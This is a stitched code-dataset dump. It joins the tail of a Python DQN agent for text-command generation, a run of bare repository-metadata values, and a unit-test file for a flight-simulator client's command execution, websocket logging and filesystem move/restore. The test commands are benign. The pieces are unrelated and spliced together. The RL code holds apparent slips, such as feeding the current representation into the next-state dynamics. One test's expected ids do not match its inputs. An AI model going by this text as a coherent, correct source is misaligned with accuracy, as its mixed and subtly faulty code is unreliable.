input_target = self.get_word_input_from_ids(input_target)
ground_truth = self.get_word_input_from_ids(ground_truth)
input_obs = self.get_word_input(observation_strings)
next_input_obs = self.get_word_input(next_observation_strings)
h_obs, obs_mask = self.encode(observation_strings, use_model="online")
aggregated_obs_representation = self.online_net.aggretate_information(h_obs, obs_mask, h_td, td_mask) # batch x obs_length x hid
averaged_representation = self.online_net.masked_mean(aggregated_obs_representation, obs_mask) # batch x hid
current_dynamics = self.online_net.rnncell(averaged_representation, previous_dynamics) if previous_dynamics is not None else self.online_net.rnncell(averaged_representation)
target_mask = compute_mask(input_target) # mask of ground truth should be the same
pred = self.online_net.decode(input_target, target_mask, aggregated_obs_representation, obs_mask, current_dynamics, input_obs) # batch x target_length x vocab
q_value = GetGenerationQValue(pred * target_mask.unsqueeze(-1), ground_truth, target_mask)
previous_dynamics = current_dynamics
if (not contains_first_step) and step_no < self.rl_replay_sample_update_from:
q_value = q_value.detach()
previous_dynamics = previous_dynamics.detach()
continue
with torch.no_grad():
if self.noisy_net:
self.target_net.reset_noise() # Sample new target net noise
# pns Probabilities p(s_t+n, ·; θonline)
next_h_obs, next_obs_mask = self.encode(next_observation_strings, use_model="online")
next_aggregated_obs_representation = self.online_net.aggretate_information(next_h_obs, next_obs_mask, h_td, td_mask) # batch x obs_length x hid
next_averaged_representation = self.online_net.masked_mean(next_aggregated_obs_representation, next_obs_mask) # batch x hid
next_dynamics = self.online_net.rnncell(averaged_representation, current_dynamics) if current_dynamics is not None else self.online_net.rnncell(next_averaged_representation)
# Perform argmax action selection using online network: argmax_a[(z, p(s_t+n, a; θonline))]
# greedy generation
input_target_list = [[self.word2id["[CLS]"]] for i in range(batch_size)]
eos = np.zeros(batch_size)
for _ in range(self.max_target_length):
input_target = copy.deepcopy(input_target_list)
input_target = pad_sequences(input_target, maxlen=max_len(input_target)).astype('int32')
input_target = to_pt(input_target, self.use_cuda)
target_mask = compute_mask(input_target) # mask of ground truth should be the same
pred = self.online_net.decode(input_target, target_mask, next_aggregated_obs_representation, next_obs_mask, next_dynamics, next_input_obs) # batch x target_length x vocab
# pointer softmax
pred = to_np(pred[:, -1]) # batch x vocab
pred = np.argmax(pred, -1) # batch
for b in range(batch_size):
new_stuff = [pred[b]] if eos[b] == 0 else []
input_target_list[b] = input_target_list[b] + new_stuff
if pred[b] == self.word2id["[SEP]"]:
eos[b] = 1
if np.sum(eos) == batch_size:
break
chosen_indices = [item[1:] for item in input_target_list]
for i in range(len(chosen_indices)):
if chosen_indices[i][-1] == self.word2id["[SEP]"]:
chosen_indices[i] = chosen_indices[i][:-1]
# pns # Probabilities p(s_t+n, ·; θtarget)
next_input_target = [[self.word2id["[CLS]"]] + item for item in chosen_indices]
next_ground_truth = [item + [self.word2id["[SEP]"]] for item in chosen_indices]
next_input_target = self.get_word_input_from_ids(next_input_target)
next_ground_truth = self.get_word_input_from_ids(next_ground_truth)
next_h_obs, next_obs_mask = self.encode(next_observation_strings, use_model="target")
next_aggregated_obs_representation = self.target_net.aggretate_information(next_h_obs, next_obs_mask, h_td_t, td_mask_t) # batch x obs_length x hid
next_averaged_representation = self.target_net.masked_mean(next_aggregated_obs_representation, next_obs_mask) # batch x hid
next_dynamics = self.target_net.rnncell(averaged_representation, current_dynamics) if current_dynamics is not None else self.target_net.rnncell(next_averaged_representation)
next_target_mask = compute_mask(next_input_target) # mask of ground truth should be the same
next_pred = self.target_net.decode(next_input_target, next_target_mask, next_aggregated_obs_representation, next_obs_mask, next_dynamics, next_input_obs) # batch x target_length x vocab
next_q_value = GetGenerationQValue(next_pred * next_target_mask.unsqueeze(-1), next_ground_truth, next_target_mask) # batch
reward = reward + next_q_value * self.discount_gamma_game_reward # batch
loss = F.smooth_l1_loss(q_value, reward) # 1
loss_list.append(loss)
q_value_list.append(q_value)
loss = torch.stack(loss_list).mean()
q_value = torch.stack(q_value_list).mean()
return loss, q_value
def update_dqn_command_generation(self):
# update neural model by replaying snapshots in replay memory
if self.recurrent:
dqn_loss, q_value = self.get_drqn_loss_command_generation()
else:
dqn_loss, q_value = self.get_dqn_loss_command_generation()
if dqn_loss is None:
return None, None
# Backpropagate
self.online_net.zero_grad()
self.optimizer.zero_grad()
dqn_loss.backward()
# `clip_grad_norm` helps prevent the exploding gradient problem in RNNs / LSTMs.
torch.nn.utils.clip_grad_norm_(self.online_net.parameters(), self.clip_grad_norm)
self.optimizer.step() # apply gradients
return to_np(torch.mean(dqn_loss)), to_np(torch.mean(q_value))
def update_dqn(self):
if self.action_space == "generation":
return self.update_dqn_command_generation()
elif self.action_space == "beam_search_choice":
return self.update_dqn_beam_search_choice()
elif self.action_space in ["admissible", "exhaustive"]:
return self.update_dqn_admissible_commands()
else:
raise NotImplementedError()
| 59.623053
| 240
| 0.622168
| 7,050
| 57,417
| 4.709078
| 0.053617
| 0.029158
| 0.040664
| 0.013253
| 0.902949
| 0.888581
| 0.874514
| 0.863731
| 0.860839
| 0.851471
| 0
| 0.005286
| 0.298204
| 57,417
| 963
| 241
| 59.623053
| 0.818315
| 0.099413
| 0
| 0.792373
| 0
| 0
| 0.014191
| 0.000604
| 0
| 0
| 0
| 0
| 0.002825
| 1
| 0.032486
| false
| 0
| 0.014124
| 0
| 0.111582
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9a907a999989e3e41784c0a5e7498158a7ba6c69
| 42,568
|
py
|
Python
|
tests/test_command.py
|
bp-flugsimulator/client
|
ad2fa25d28f6d05a5ddb8bb3ed1b844a13eddda4
|
[
"MIT"
] | null | null | null |
tests/test_command.py
|
bp-flugsimulator/client
|
ad2fa25d28f6d05a5ddb8bb3ed1b844a13eddda4
|
[
"MIT"
] | 6
|
2018-01-22T21:19:29.000Z
|
2018-03-31T11:45:53.000Z
|
tests/test_command.py
|
bp-flugsimulator/client
|
ad2fa25d28f6d05a5ddb8bb3ed1b844a13eddda4
|
[
"MIT"
] | null | null | null |
"""
Unit tests for the module client.command.
"""
#pylint: disable=C0111, C0103
import unittest
import asyncio
import os
import sys
import random
import string
import websockets
import shutil
from os import remove, getcwd
from os.path import join, isfile
from uuid import uuid4
from utils import Rpc, Status
from .testcases import EventLoopTestCase, FileSystemTestCase
import client.command
import client.shorthand
from client.logger import LOGGER
class TestCommands(EventLoopTestCase):
def test_execution_nonexisting_directory(self):
path = os.path.join(os.getcwd(), 'appplications', 'tee.py')
if os.name == 'nt':
return_value = '1'
else:
return_value = '127'
self.assertEqual(
return_value,
self.loop.run_until_complete(
client.command.execute(
random.choice(string.digits),
uuid4().hex, path, [])),
)
def test_execution_wrong_path_object(self):
self.assertRaises(
ValueError,
self.loop.run_until_complete,
client.command.execute(
random.choice(string.digits),
uuid4().hex, "calcs.exe", "this is a arguments list"),
)
def test_execution_wrong_prog_object(self):
self.assertRaises(
ValueError,
self.loop.run_until_complete,
client.command.execute(
random.choice(string.digits),
uuid4().hex, ["calcs.exe"], []),
)
def test_execution_wrong_arguments_elements(self):
self.assertRaises(
ValueError,
self.loop.run_until_complete,
client.command.execute(
random.choice(string.digits),
uuid4().hex, "calcs.exe", [1, 2, 34]),
)
def test_execution_echo_shell(self):
if os.name == 'nt':
prog = "C:\\Windows\\System32\\cmd.exe"
args = ["/c", "ECHO %date%"]
else:
prog = "/bin/sh"
args = ["-c", "echo $(date)"]
self.assertEqual(
'0',
self.loop.run_until_complete(
client.command.execute(
random.choice(string.digits),
uuid4().hex, prog, args)),
)
def test_online(self):
result = self.loop.run_until_complete(client.command.online())
self.assertIsNone(result)
def test_execution_directory(self):
path = join(getcwd(), 'applications')
if os.name == 'nt':
prog = join(path, 'folder with spaces', 'echo with spaces.bat')
else:
prog = join(path, 'folder with spaces', 'echo with spaces.sh')
self.assertEqual('0',
self.loop.run_until_complete(
client.command.execute(
random.choice(string.digits),
uuid4().hex, prog, [])))
self.assertTrue(isfile(join(path, 'folder with spaces', 'test.txt')))
remove(join(path, 'folder with spaces', 'test.txt'))
def test_cancel_execution_with_terminate(self):
if os.name is 'nt':
prog = "C:\\Windows\\System32\\cmd.exe"
args = ["/c", "notepad.exe"]
return_code = '15'
else:
prog = "/bin/bash"
args = ['-c', '"sleep 100"']
return_code = '143' # TODO why not -15 ???
@asyncio.coroutine
def create_and_cancel_task():
task = self.loop.create_task(
client.command.execute(
random.choice(string.digits),
uuid4().hex, prog, args))
yield from asyncio.sleep(0.5)
task.cancel()
print("canceled task")
result = yield from task
return result
res = self.loop.run_until_complete(create_and_cancel_task())
self.assertEqual(return_code, res)
def test_cancel_execution_with_kill(self):
prog = sys.executable
args = [join(getcwd(), 'applications', 'kill_me.py')]
if os.name is 'nt':
return_code = '15'
else:
return_code = '137' # TODO why not -9 ???
@asyncio.coroutine
def create_and_cancel_task():
task = self.loop.create_task(
client.command.execute(
random.choice(string.digits),
uuid4().hex, prog, args))
yield from asyncio.sleep(0.5)
task.cancel()
print("canceled task")
result = yield from task
return result
res = self.loop.run_until_complete(create_and_cancel_task())
self.assertEqual(return_code, res)
def test_get_log(self):
uuid = uuid4().hex
message = ''.join([
random.choice(string.ascii_letters + string.digits)
for n in range(32)
])
self.assertEqual('0',
self.loop.run_until_complete(
client.command.execute(
random.choice(string.digits), uuid, 'echo',
[message])))
res = self.loop.run_until_complete(client.command.get_log(uuid))
if os.name == 'nt':
self.assertIn(
'echo ' + message + ' \r\n ' + message + '\r\n',
res['log'],
)
else:
self.assertIn(
message + '\n',
res['log'],
)
self.assertEqual(
uuid,
res['uuid'],
)
def test_get_log_unknown_uuid(self):
self.assertRaises(KeyError, self.loop.run_until_complete,
client.command.get_log('abcdefg'))
def test_websocket_logging(self):
if os.name is 'nt':
prog = 'cmd'
def sleep_hack(seconds):
return 'ping 8.8.8.8 -n ' + seconds + ' >nul'
args = [
'/c',
sleep_hack('3') + '& echo 0&' + sleep_hack('1') + ' & echo 1'
]
expected_log = b'0\r\n1\r\n'
else:
prog = '/bin/bash'
args = ['-c', '"sleep 3; echo 0; sleep 1; echo 1"']
expected_log = b'0\n1\n'
uuid = uuid4().hex
@asyncio.coroutine
def enable_logging():
yield from asyncio.sleep(1)
yield from client.command.enable_logging(uuid)
@asyncio.coroutine
def start_execution():
yield from client.command.execute(
random.choice(string.digits), uuid, prog, args)
@asyncio.coroutine
def start_server():
finished = asyncio.Future()
@asyncio.coroutine
def websocket_handler(websocket, path):
self.assertEqual('/logs', path)
# receive log from file
json = yield from websocket.recv()
log = Status.from_json(json).payload['log'].encode()
# ack
yield from websocket.send('')
#receive dynamic log
while True:
json = yield from websocket.recv()
# ack
msg = Status.from_json(json).payload['log'].encode()
log += msg
if msg == b'':
break
else:
yield from websocket.send('')
self.assertIn(expected_log, log)
print('finished server')
finished.set_result(None)
server_handle = yield from websockets.serve(
websocket_handler, host='127.0.0.1', port=8750)
yield from finished
server_handle.close()
yield from server_handle.wait_closed()
@asyncio.coroutine
def wait_for_all():
tasks = {
start_server(),
start_execution(),
enable_logging(),
}
yield from asyncio.wait(tasks, return_when=asyncio.ALL_COMPLETED)
yield from client.command.disable_logging(uuid)
LOGGER.url = 'ws://localhost:8750/logs'
self.loop.run_until_complete(wait_for_all())
def test_websocket_logging_early_disable(self):
if os.name is 'nt':
prog = 'cmd'
def sleep_hack(seconds):
return 'ping 8.8.8.8 -n ' + seconds + ' >nul'
args = [
'/c',
sleep_hack('3') + '& echo 0&' + sleep_hack('3') + ' & echo 1'
]
expected_log = b'0\r\n'
else:
prog = '/bin/bash'
args = ['-c', '"sleep 3; echo 0; sleep 3; echo 1"']
expected_log = b'0\n'
uuid = uuid4().hex
@asyncio.coroutine
def enable_logging():
yield from asyncio.sleep(1)
yield from client.command.enable_logging(uuid)
@asyncio.coroutine
def disable_logging():
yield from asyncio.sleep(4)
yield from client.command.disable_logging(uuid)
@asyncio.coroutine
def start_execution():
yield from client.command.execute(
random.choice(string.digits), uuid, prog, args)
@asyncio.coroutine
def start_server():
finished = asyncio.Future()
@asyncio.coroutine
def websocket_handler(websocket, path):
self.assertEqual('/logs', path)
# receive log from file
json = yield from websocket.recv()
log = Status.from_json(json).payload['log'].encode()
# ack
yield from websocket.send('')
#receive dynamic log
while True:
try:
json = yield from websocket.recv()
# ack
yield from websocket.send('')
msg = Status.from_json(json).payload['log'].encode()
if msg == b'':
break
log += msg
except websockets.exceptions.ConnectionClosed:
break
self.assertIn(expected_log, log)
print('finished server')
finished.set_result(None)
server_handle = yield from websockets.serve(
websocket_handler, host='127.0.0.1', port=8750)
yield from finished
server_handle.close()
yield from server_handle.wait_closed()
@asyncio.coroutine
def wait_for_all():
tasks = {
start_server(),
start_execution(),
enable_logging(),
disable_logging(),
}
yield from asyncio.wait(tasks, return_when=asyncio.ALL_COMPLETED)
LOGGER.url = 'ws://localhost:8750/logs'
self.loop.run_until_complete(wait_for_all())
def test_chain_command_none(self):
result = self.loop.run_until_complete(
client.command.chain_execution(commands=[{
'method': None,
'uuid': None,
'arguments': [],
}]))
self.assertEqual(result, [])
def test_chain_command_success(self):
if os.name == 'nt':
prog = "C:\\Windows\\System32\\cmd.exe"
args = ["/c", "ECHO %date%"]
else:
prog = "/bin/sh"
args = ["-c", "echo $(date)"]
result = self.loop.run_until_complete(
client.command.chain_execution(commands=[{
'method': 'execute',
'uuid': 'thisisunique',
'arguments': {
'pid': random.choice(string.digits),
'own_uuid': uuid4().hex,
'path': prog,
'arguments': args
},
}]))
response = Status(
Status.ID_OK,
{
'method': 'execute',
'result': '0',
},
'thisisunique',
)
self.assertEqual(Status(**result[0]), response)
def test_chain_command_one_failed(self):
if os.name == 'nt':
prog = "C:\\Windows\\System32\\cmd.exe"
args = ["/c", "ECHO %date%"]
else:
prog = "/bin/sh"
args = ["-c", "echo $(date)"]
result = self.loop.run_until_complete(
client.command.chain_execution(commands=[{
'method': 'execute',
'uuid': 0,
'arguments': {
'pid': 1,
'own_uuid': 0,
'path': prog,
},
}, {
'method': 'execute',
'uuid': 1,
'arguments': {
'pid': 1,
'own_uuid': 1,
'path': prog,
'arguments': args
},
}]))
response1 = Status(
Status.ID_ERR,
{
'method':
'execute',
'result':
"execute() missing 1 required positional argument: 'arguments'",
},
'uniqueidforfirst',
)
response2 = Status(
Status.ID_ERR,
{
'method':
'execute',
'result':
'Could not execute because earlier command was not successful.',
},
'uniqueidforsecond',
)
self.assertEqual(Status(**result[0]), response1)
self.assertEqual(Status(**result[1]), response2)
class FileCommandFilesTests(FileSystemTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.backup_ending = "_BACK"
def test_filesystem_move_destination_exists(self):
(source, _, _) = self.provideFile("test.abc")
(destination, _, _) = self.provideFile("test.abc.link")
backup = destination + self.backup_ending
self.assertFilesArePresent(source, destination)
self.assertFilesAreNotPresent(backup)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"file",
destination,
"file",
self.backup_ending,
))
self.assertFilesArePresent(destination, backup, source)
def test_filesystem_move_destination_not_exists(self):
(source, _, _) = self.provideFile("test.abc")
destination = self.joinPath("test.abc.link")
backup = destination + self.backup_ending
self.assertFilesArePresent(source)
self.assertFilesAreNotPresent(backup, destination)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"file",
destination,
"file",
self.backup_ending,
))
self.assertFilesArePresent(destination, source)
self.assertFilesAreNotPresent(backup)
def test_filesystem_move_source_not_exists(self):
source = self.joinPath("test.abc")
(destination, _, _) = self.provideFile("test.abc.link")
self.assertFilesArePresent(destination)
self.assertFilesAreNotPresent(source)
self.assertRaises(
FileNotFoundError,
self.loop.run_until_complete,
client.command.filesystem_move(
source,
"file",
destination,
"file",
self.backup_ending,
),
)
self.assertFilesArePresent(destination)
self.assertFilesAreNotPresent(source)
def test_filesystem_move_backup_exists(self):
(source, _, _) = self.provideFile("test.abc")
(destination, _, _) = self.provideFile("test.abc.link")
(backup, _, _) = self.provideFile("test.abc.link" + self.backup_ending)
self.assertFilesArePresent(source, destination, backup)
self.assertRaises(
FileExistsError,
self.loop.run_until_complete,
client.command.filesystem_move(
source,
"file",
destination,
"file",
self.backup_ending,
),
)
self.assertFilesArePresent(source, destination, backup)
def test_filesystem_move_destination_folder_success(self):
(source, _, _) = self.provideFile("test.abc")
destination_path = self.provideDirectory("this_is_my_folder")
destination = self.joinPath("this_is_my_folder/test.abc")
backup = destination + self.backup_ending
self.assertFilesArePresent(source)
self.assertFilesAreNotPresent(backup, destination)
self.assertDirsArePresent(destination_path)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"file",
destination_path,
"dir",
self.backup_ending,
))
self.assertFilesArePresent(source, destination)
self.assertFilesAreNotPresent(backup)
self.assertDirsArePresent(destination_path)
def test_filesystem_move_destination_folder_destination_exist(self):
(source, _, _) = self.provideFile("test.abc")
destination_path = self.provideDirectory("this_is_my_folder")
(destination, _, _) = self.provideFile("this_is_my_folder/test.abc")
backup = destination + self.backup_ending
self.assertFilesArePresent(source, destination)
self.assertFilesAreNotPresent(backup)
self.assertDirsArePresent(destination_path)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"file",
destination_path,
"dir",
self.backup_ending,
))
self.assertFilesArePresent(source, destination, backup)
self.assertDirsArePresent(destination_path)
def test_filesystem_move_destination_folder_backup_exist(self):
(source, _, _) = self.provideFile("test.abc")
destination_path = self.provideDirectory("this_is_my_folder")
(destination, _, _) = self.provideFile("this_is_my_folder/test.abc")
(backup, _, _) = self.provideFile(
"this_is_my_folder/test.abc" + self.backup_ending)
self.assertFilesArePresent(source, destination, backup)
self.assertDirsArePresent(destination_path)
self.assertRaises(
FileExistsError,
self.loop.run_until_complete,
client.command.filesystem_move(
source,
"file",
destination_path,
"dir",
self.backup_ending,
),
)
self.assertFilesArePresent(source, destination, backup)
self.assertDirsArePresent(destination_path)
def test_filesystem_restore_no_backup(self):
(source, _, hash_source) = self.provideFile("test.abc")
destination = self.joinPath("test.abc.link")
backup = destination + self.backup_ending
self.assertFilesArePresent(source)
self.assertFilesAreNotPresent(destination, backup)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"file",
destination,
"file",
self.backup_ending,
))
self.assertFilesArePresent(source, destination)
self.assertFilesAreNotPresent(backup)
self.loop.run_until_complete(
client.command.filesystem_restore(
source,
"file",
destination,
"file",
self.backup_ending,
hash_source,
))
self.assertFilesArePresent(source)
self.assertFilesAreNotPresent(destination, backup)
def test_filesystem_restore_no_backup_destination_dir(self):
(source, _, hash_source) = self.provideFile("test.abc")
destination_path = self.provideDirectory("this_is_my_folder")
(destination, _, _) = self.provideFile("this_is_my_folder/test.abc")
backup = self.joinPath(
"this_is_my_folder/test.abc" + self.backup_ending)
self.assertFilesArePresent(source, destination)
self.assertFilesAreNotPresent(backup)
self.assertDirsArePresent(destination_path)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"file",
destination_path,
"dir",
self.backup_ending,
))
self.assertFilesArePresent(source, destination, backup)
self.assertDirsArePresent(destination_path)
self.loop.run_until_complete(
client.command.filesystem_restore(
source,
"file",
destination_path,
"dir",
self.backup_ending,
hash_source,
))
self.assertFilesArePresent(source, destination)
self.assertFilesAreNotPresent(backup)
self.assertDirsArePresent(destination_path)
def test_filesystem_restore_with_backup(self):
(source, data_source, hash_source) = self.provideFile("test.abc")
destination_path = self.provideDirectory("this_is_my_folder")
(
destination,
data_destination,
_,
) = self.provideFile("this_is_my_folder/test.abc")
backup = self.joinPath(
"this_is_my_folder/test.abc" + self.backup_ending)
self.assertFilesArePresent(source, destination)
self.assertDirsArePresent(destination_path)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"file",
destination_path,
"dir",
self.backup_ending,
))
self.assertFilesArePresent(source, destination, backup)
with open(destination, 'r') as clone:
self.assertEqual(clone.read(), data_source)
self.assertDirsArePresent(destination_path)
self.loop.run_until_complete(
client.command.filesystem_restore(
source,
"file",
destination_path,
"dir",
self.backup_ending,
hash_source,
))
self.assertFilesArePresent(source, destination)
with open(destination, 'r') as clone:
self.assertEqual(clone.read(), data_destination)
self.assertDirsArePresent(destination_path)
def test_filesystem_restore_no_destination_with_backup(self):
(source, _, hash_source) = self.provideFile("test.abc")
destination = self.joinPath("test.abc.link")
(
backup,
data_backup,
_,
) = self.provideFile("test.abc.link" + self.backup_ending)
self.assertFilesArePresent(source, backup)
self.assertFilesAreNotPresent(destination)
self.loop.run_until_complete(
client.command.filesystem_restore(
source,
"file",
destination,
"file",
self.backup_ending,
hash_source,
))
self.assertFilesArePresent(source, destination)
self.assertFilesAreNotPresent(backup)
with open(destination, 'r') as clone:
self.assertEqual(clone.read(), data_backup)
def test_filesystem_restore_no_destination(self):
(source, _, hash_source) = self.provideFile("test.abc")
destination = self.joinPath("test.abc.link")
backup = destination + self.backup_ending
self.assertFilesArePresent(source)
self.assertFilesAreNotPresent(destination, backup)
self.loop.run_until_complete(
client.command.filesystem_restore(
source,
"file",
destination,
"file",
self.backup_ending,
hash_source,
))
self.assertFilesArePresent(source)
self.assertFilesAreNotPresent(destination, backup)
"""
def test_filesystem_restore_replaced(self):
(source, _, hash_source) = self.provideFile("test.abc")
(destination, _, _) = self.provideFile("test.abc.link")
backup = destination + self.backup_ending
self.assertFilesArePresent(source, destination)
self.assertFilesAreNotPresent(backup)
self.assertRaisesRegex(
ValueError,
"file .* was changed while it was replaced",
self.loop.run_until_complete,
client.command.filesystem_restore(
source,
"file",
destination,
"file",
self.backup_ending,
hash_source,
),
)
self.assertFilesArePresent(source, destination)
self.assertFilesAreNotPresent(backup)
"""
def test_filesystem_restore_modified(self):
(source, _, hash_source) = self.provideFile("test.abc")
destination = self.joinPath("test.abc.link")
backup = destination + self.backup_ending
self.assertFilesArePresent(source)
self.assertFilesAreNotPresent(backup, destination)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"file",
destination,
"file",
self.backup_ending,
))
self.assertFilesArePresent(source, destination)
self.assertFilesAreNotPresent(backup)
with open(destination, 'w+') as clone:
clone.write("test")
self.loop.run_until_complete(
client.command.filesystem_restore(
source,
"file",
destination,
"file",
self.backup_ending,
hash_source,
))
self.assertFilesArePresent(source)
self.assertFilesAreNotPresent(backup, destination)
class FileCommandDirsTests(FileSystemTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.backup_ending = "_BACK"
def test_filesystem_move_destination_exists(self):
(source, _, _) = self.provideFilledDirectory("test.abc")
(destination, _, _) = self.provideFilledDirectory("test.abc.link")
backup = destination + self.backup_ending
self.assertDirsArePresent(source, destination)
self.assertDirsAreNotPresent(backup)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"dir",
destination,
"file",
self.backup_ending,
))
self.assertDirsArePresent(destination, backup, source)
def test_filesystem_move_destination_not_exists(self):
(source, _, _) = self.provideFilledDirectory("test.abc")
destination = self.joinPath("test.abc.link")
backup = destination + self.backup_ending
self.assertDirsArePresent(source)
self.assertDirsAreNotPresent(backup, destination)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"dir",
destination,
"file",
self.backup_ending,
))
self.assertDirsArePresent(destination, source)
self.assertDirsAreNotPresent(backup)
def test_filesystem_move_source_not_exists(self):
source = self.joinPath("test.abc")
(destination, _, _) = self.provideFilledDirectory("test.abc.link")
self.assertDirsArePresent(destination)
self.assertDirsAreNotPresent(source)
self.assertRaises(
FileNotFoundError,
self.loop.run_until_complete,
client.command.filesystem_move(
source,
"dir",
destination,
"file",
self.backup_ending,
),
)
self.assertDirsArePresent(destination)
self.assertDirsAreNotPresent(source)
def test_filesystem_move_backup_exists(self):
(source, _, _) = self.provideFilledDirectory("test.abc")
(destination, _, _) = self.provideFilledDirectory("test.abc.link")
(backup, _,
_) = self.provideFilledDirectory("test.abc.link" + self.backup_ending)
self.assertDirsArePresent(source, destination, backup)
self.assertRaises(
FileExistsError,
self.loop.run_until_complete,
client.command.filesystem_move(
source,
"dir",
destination,
"file",
self.backup_ending,
),
)
self.assertDirsArePresent(source, destination, backup)
def test_filesystem_move_destination_folder_success(self):
(source, _, _) = self.provideFilledDirectory("test.abc")
destination_path = self.provideDirectory("this_is_my_folder")
destination = self.joinPath("this_is_my_folder/test.abc")
backup = destination + self.backup_ending
self.assertDirsAreNotPresent(backup, destination)
self.assertDirsArePresent(destination_path, source)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"dir",
destination_path,
"dir",
self.backup_ending,
))
self.assertDirsAreNotPresent(backup)
self.assertDirsArePresent(destination_path, source, destination)
def test_filesystem_move_destination_folder_destination_exist(self):
(source, _, _) = self.provideFilledDirectory("test.abc")
destination_path = self.provideDirectory("this_is_my_folder")
(destination, _,
_) = self.provideFilledDirectory("this_is_my_folder/test.abc")
backup = destination + self.backup_ending
self.assertDirsAreNotPresent(backup)
self.assertDirsArePresent(destination_path, source, destination)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"dir",
destination_path,
"dir",
self.backup_ending,
))
self.assertDirsArePresent(source, destination, backup,
destination_path)
def test_filesystem_move_destination_folder_backup_exist(self):
(source, _, _) = self.provideFilledDirectory("test.abc")
destination_path = self.provideDirectory("this_is_my_folder")
(destination, _,
_) = self.provideFilledDirectory("this_is_my_folder/test.abc")
(backup, _, _) = self.provideFilledDirectory(
"this_is_my_folder/test.abc" + self.backup_ending)
self.assertDirsArePresent(source, destination, backup,
destination_path)
self.assertRaises(
FileExistsError,
self.loop.run_until_complete,
client.command.filesystem_move(
source,
"dir",
destination_path,
"dir",
self.backup_ending,
),
)
self.assertDirsArePresent(source, destination, backup,
destination_path)
def test_filesystem_restore_no_backup(self):
(source, _, hash_source) = self.provideFilledDirectory("test.abc")
destination = self.joinPath("test.abc.link")
backup = destination + self.backup_ending
self.assertDirsArePresent(source)
self.assertDirsAreNotPresent(destination, backup)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"dir",
destination,
"file",
self.backup_ending,
))
self.assertDirsArePresent(source, destination)
self.assertDirsAreNotPresent(backup)
self.loop.run_until_complete(
client.command.filesystem_restore(
source,
"dir",
destination,
"file",
self.backup_ending,
hash_source,
))
self.assertDirsArePresent(source)
self.assertDirsAreNotPresent(destination, backup)
def test_filesystem_restore_no_backup_destination_dir(self):
(source, _, hash_source) = self.provideFilledDirectory("test.abc")
destination_path = self.provideDirectory("this_is_my_folder")
(destination, _,
_) = self.provideFilledDirectory("this_is_my_folder/test.abc")
backup = self.joinPath(
"this_is_my_folder/test.abc" + self.backup_ending)
self.assertDirsArePresent(source, destination, destination_path)
self.assertDirsAreNotPresent(backup)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"dir",
destination_path,
"dir",
self.backup_ending,
))
self.assertDirsArePresent(source, destination, backup,
destination_path)
self.loop.run_until_complete(
client.command.filesystem_restore(
source,
"dir",
destination_path,
"dir",
self.backup_ending,
hash_source,
))
self.assertDirsArePresent(source, destination, destination_path)
self.assertDirsAreNotPresent(backup)
def test_filesystem_restore_with_backup(self):
(source, _, hash_source) = self.provideFilledDirectory("test.abc")
destination_path = self.provideDirectory("this_is_my_folder")
(
destination,
files_destination,
_,
) = self.provideFilledDirectory("this_is_my_folder/test.abc")
backup = self.joinPath(
"this_is_my_folder/test.abc" + self.backup_ending)
self.assertDirsArePresent(source, destination, destination_path)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"dir",
destination_path,
"dir",
self.backup_ending,
))
self.assertDirsArePresent(source, destination, backup)
self.assertDirsArePresent(destination_path)
self.assertDirsEqual(destination, source)
self.loop.run_until_complete(
client.command.filesystem_restore(
source,
"dir",
destination_path,
"dir",
self.backup_ending,
hash_source,
))
self.assertDirsArePresent(source, destination, destination_path)
self.assertDirEqual(destination,
list(map(
lambda f: f[2],
files_destination,
)))
def test_filesystem_restore_no_destination_with_backup(self):
(source, _, hash_source) = self.provideFilledDirectory("test.abc")
destination = self.joinPath("test.abc.link")
(
backup,
files_backup,
_,
) = self.provideFilledDirectory("test.abc.link" + self.backup_ending)
self.assertDirsArePresent(source, backup)
self.assertDirsAreNotPresent(destination)
self.loop.run_until_complete(
client.command.filesystem_restore(
source,
"dir",
destination,
"file",
self.backup_ending,
hash_source,
))
self.assertDirsArePresent(source, destination)
self.assertDirsAreNotPresent(backup)
self.assertDirEqual(destination, list(
map(lambda f: f[2], files_backup)))
def test_filesystem_restore_no_destination(self):
(source, _, hash_source) = self.provideFilledDirectory("test.abc")
destination = self.joinPath("test.abc.link")
backup = destination + self.backup_ending
self.assertDirsArePresent(source)
self.assertDirsAreNotPresent(destination, backup)
self.loop.run_until_complete(
client.command.filesystem_restore(
source,
"dir",
destination,
"file",
self.backup_ending,
hash_source,
))
self.assertDirsArePresent(source)
self.assertDirsAreNotPresent(destination, backup)
"""
def test_filesystem_restore_replaced(self):
(source, _, hash_source) = self.provideFilledDirectory("test.abc")
(destination, _, _) = self.provideFilledDirectory("test.abc.link")
backup = destination + self.backup_ending
self.assertDirsArePresent(source, destination)
self.assertDirsAreNotPresent(backup)
self.assertRaisesRegex(
ValueError,
"directory .* was changed while it was replaced",
self.loop.run_until_complete,
client.command.filesystem_restore(
source,
"dir",
destination,
"file",
self.backup_ending,
hash_source,
),
)
self.assertDirsArePresent(source, destination)
self.assertDirsAreNotPresent(backup)
"""
def test_filesystem_restore_modified(self):
(source, _, hash_source) = self.provideFilledDirectory("test.abc")
destination = self.joinPath("test.abc.link")
backup = destination + self.backup_ending
self.assertDirsArePresent(source)
self.assertDirsAreNotPresent(backup, destination)
self.loop.run_until_complete(
client.command.filesystem_move(
source,
"dir",
destination,
"file",
self.backup_ending,
))
self.assertDirsArePresent(source, destination)
